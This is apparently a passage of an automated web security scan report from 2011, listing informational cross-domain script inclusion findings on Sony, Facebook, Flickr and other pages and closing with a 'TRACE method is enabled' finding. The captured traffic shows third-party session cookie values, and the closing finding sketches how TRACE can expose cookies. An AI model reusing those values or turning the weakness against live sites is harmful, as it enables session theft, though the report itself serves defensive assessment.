<script src="http://a0.twimg.com/a/1308769086/javascripts/dismissable.js?1308259132" type="text/javascript"></script>
...[SNIP]...

11.3. http://us.playstation.com/psn/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.playstation.com
Path:   /psn/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /psn/ HTTP/1.1
Host: us.playstation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:34 GMT
Server: Apache
Last-Modified: Wed, 08 Jun 2011 20:21:19 GMT
ETag: "b2058a-f02f-4a539144aadc0"
Accept-Ranges: bytes
Content-Length: 61487
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: SONYCOOKIE1=2741283008.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">    <head><meta http-equi
...[SNIP]...
<!-- Added javascript for site catalyst and T&T integration -->            <script type="text/javascript" src="http://webassetsg.scea.com/pscomauth/groups/public/documents/webasset/ps_mbox_js.js"></script>
...[SNIP]...
<!-- end -->         <script type="text/javascript" src="http://webassetsh.scea.com/pscomauth/groups/public/documents/webasset/swfobject.js" charset="utf-8"></script>        <script type="text/javascript" src="http://webassetsi.scea.com/pscomauth/groups/public/documents/webasset/ps_jquery-1.3.2.min_js.js" charset="utf-8"></script>        <script type="text/javascript" src="http://webassetsj.scea.com/pscomauth/groups/public/documents/webasset/pscommon.js"></script>                        <script type="text/javascript" src="http://webassets.scea.com/pscomauth/groups/public/documents/webasset/usps_ga_code.js"></script>
...[SNIP]...
</script>                <script type="text/javascript" src="http://webassetsb.scea.com/pscomauth/groups/public/documents/webasset/ps_fx_js.js" charset="utf-8"></script>        <script type="text/javascript" src="http://webassetsc.scea.com/pscomauth/groups/public/documents/webasset/ps_uspsglobal_js.js" charset="utf-8"></script>
...[SNIP]...
</div> <script type="text/javascript" src="http://webassetsa.scea.com/pscomauth/groups/public/documents/webasset/ps_login_js.js" charset="utf-8"> </script>
...[SNIP]...
<!-- SS_BEGIN_SNIPPET(fragment5,2)-->                <script type="text/javascript" src="http://webassetsb.scea.com/pscomauth/groups/public/documents/webasset/jquery_tools_min.js"></script><script type="text/javascript" src="http://webassetsc.scea.com/pscomauth/groups/public/documents/webasset/ps_tick_combined_js.js"></script><script type="text/javascript" src="http://webassetsd.scea.com/pscomauth/groups/public/documents/webasset/ticker.js"></script>
...[SNIP]...
<div id="tickerItemHolder">        <script type="text/javascript" src="http://webassetse.scea.com/pscomauth/groups/public/documents/webasset/ps_ticker_js.js">        </script>
...[SNIP]...
</div> <script type="text/javascript" src="http://webassetsf.scea.com/pscomauth/groups/public/documents/webasset/usps_s_code.js"></script>
...[SNIP]...
<!-- End of DoubleClick Floodlight Tag: Please do not remove -->                <SCRIPT type="text/javascript" src="http://webassetsg.scea.com/pscomauth/groups/public/documents/webasset/ps_mbox_js.js"></script>
...[SNIP]...

11.4. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/likebox.php?id=196942217311&width=248&height=291&connections=8&stream=false&header=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://cyberghostvpn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.131.25
X-Cnection: close
Date: Thu, 23 Jun 2011 15:25:28 GMT
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/fKYLFU6W_MM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/Juua_Gv7yKY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/XhueOm5bqOx.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/PD7V_khohjs.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/NMbCdi3OCeH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/L8yUExs-fkD.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/SogayxsfDSh.js"></script>
...[SNIP]...

11.5. http://www.facebook.com/sonyelectronics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sonyelectronics

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sonyelectronics HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=jVkDTsgSBkZEpRPRjIw6e36G; expires=Sat, 22-Jun-2013 15:19:41 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=rLE1G; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.171.37
Connection: close
Date: Thu, 23 Jun 2011 15:19:41 GMT
Content-Length: 169018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/y0/r/Q9FznRzxmjD.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/Juua_Gv7yKY.js"></script>
...[SNIP]...

11.6. http://www.flickr.com/groups/sonycameraclub

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /groups/sonycameraclub

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /groups/sonycameraclub HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:43 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=0jlvl41706mcf&b=3&s=ij; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:43 GMT; path=/; domain=.flickr.com
X-Served-By: www56.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82289

<!DOCTYPE html>
<html lang="en-us">
<head>

   <title>Flickr: Sony Camera Club</title>


       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="keywords" content="photograph
...[SNIP]...
</script>


                                   <script src="http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm7&amp;j/.GD/3.3.0/.FN/.FN-.E.A.vSKm7"></script>
...[SNIP]...

11.7. http://www.flickr.com/groups/sonycameraclub/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /groups/sonycameraclub/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /groups/sonycameraclub/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:42 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=7i1m6g1706mce&b=3&s=ot; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:42 GMT; path=/; domain=.flickr.com
X-Served-By: www108.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82290

<!DOCTYPE html>
<html lang="en-us">
<head>

   <title>Flickr: Sony Camera Club</title>


       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="keywords" content="photograph
...[SNIP]...
</script>


                                   <script src="http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm7&amp;j/.GD/3.3.0/.FN/.FN-.E.A.vSKm7"></script>
...[SNIP]...

11.8. http://www.huddletogether.com/projects/lightbox2/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huddletogether.com
Path:   /projects/lightbox2/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:43 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 17:56:45 GMT
ETag: "a0be022-2f25-49ec5804b3140"
Accept-Ranges: bytes
Content-Length: 12069
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   
   <title>Lightbox 2<
...[SNIP]...
<!-- end #content -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

11.9. http://www.omnitechsupport.com/about.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /about.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/fee.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.4.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32487

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

11.10. http://www.omnitechsupport.com/spyware_removal.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /spyware_removal.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /spyware_removal.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/fee.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.3.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42222

<html>
<head>
<title>Spyware Removal | Spyware Adware Remove</title>
<meta name="description" content="Omnitechsupport.com offers complete 24/7 spyware removal services and effective spyware adware
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

11.11. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:48 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6il6pfh1t07e7jh9gcmfdeis73; expires=Sat, 16-Jul-2011 18:53:08 GMT; path=/; domain=.opensource.org
Last-Modified: Thu, 23 Jun 2011 15:16:06 GMT
ETag: "73be9325b7928055d2f550e7dc22f698"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

11.12. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/CategoryDisplay

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&identifier=S_SonyStyle_Stores HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 82841
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:00 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 82841


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<link rel="canonical" href="http://www.sonystyle.com/c/S_SonyStyle_Stores/e
...[SNIP]...
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.13. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/ContentDisplayView

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/ContentDisplayView HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 72229
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:02 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 72229


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.14. http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/OrderItemDisplay

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/OrderItemDisplay HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 92869
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:19:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: WC_PERSISTENT=xRu1VrtkgP52lzARnuVxGqRnJ6o%3d%0a%3b2011%2d06%2d23+11%3a19%3a58%2e856%5f1308841107995%2d82466%5f10151%5f241903395%2c%2d1%2cUSD%5f10151; Expires=Tue, 20 Dec 2011 15:19:58 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_241903395=241903395%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cP6bHMHjytG71reM2szqU9sVaoSplcv4qC13K3MxVyVffFlubAypUsqxwsrdjgGwciI7t%2bmUJpOpQ%0awCZ7N%2bxU8GRW1M9qkUX1QRYnKOeclHhUzZiuZ4Ag7kJUtfEcbEI83mX7QHMCV3dEPblR56Avsg%3d%3d; Path=/
Set-Cookie: TS5bbf46=629bbaf3a13ad4191c8387200e85cb355e46b2c7608495f34e0358cadb2332024890f70e222f7b4e4890f70e31c595fb302859d4; Path=/
Cache-Control: private
Pragma: no-cache
Content-Length: 92869


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- hostname: saiadsapp22 -->
<html>
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.15. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYNewsletterOptInView

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/SYNewsletterOptInView HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 76256
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:16 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 76256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!---->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.16. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYSiteMapView

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYSiteMapView

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/SYSiteMapView HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 162795
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:09 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 162795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.17. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYWishListDisplay

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/SYWishListDisplay HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 73255
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:19:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: WC_PERSISTENT=NcxPoQ35T9OIG2xvyDBqCI7m%2f6I%3d%0a%3b2011%2d06%2d23+11%3a19%3a56%2e636%5f1308841107995%2d82466%5f10151%5f241903389%2c%2d1%2cUSD%5f10151; Expires=Tue, 20 Dec 2011 15:19:56 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_241903389=241903389%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c7myjYVzeSmGi%2bSmSHBDsv5QE%2fLHtPO66u%2fvUa%2fYlSe5zgSuFTJCb5MP4YHwzkoVFU539TML12c%2fn%0aUvMgKy33JgbQLeMW1w%2b5FRcSl5w0xRgy7RkTPOUihpdheDWGKGdU5kOAsbyKsSyrEcwSZhZUfA%3d%3d; Path=/
Set-Cookie: TS5bbf46=4315494d6d4225f09c2745a0fa6895375e46b2c7608495f34e0358cadb2332024890f70e222f7b4e4890f70e471aa5e16f42170c; Path=/
Cache-Control: private
Pragma: no-cache
Content-Length: 73255


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.18. http://www.sonystyle.com/webapp/wcs/stores/servlet/SearchCatalog

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/SearchCatalog HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 92979
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:18 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 92979


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.19. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS5bbf46=16e18bd3aad35848291e7bce5bac11005e46b2c7608495f34e035480

Response

HTTP/1.1 200 OK
ntCoent-Length: 93671
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 93671
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 14:58:08 GMT
Connection: close
Cache-Control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.20. https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/CRMPortalHome

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/CRMPortalHome HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 78487
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:27 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache
Content-Length: 78487


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

12. TRACE method is enabled

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

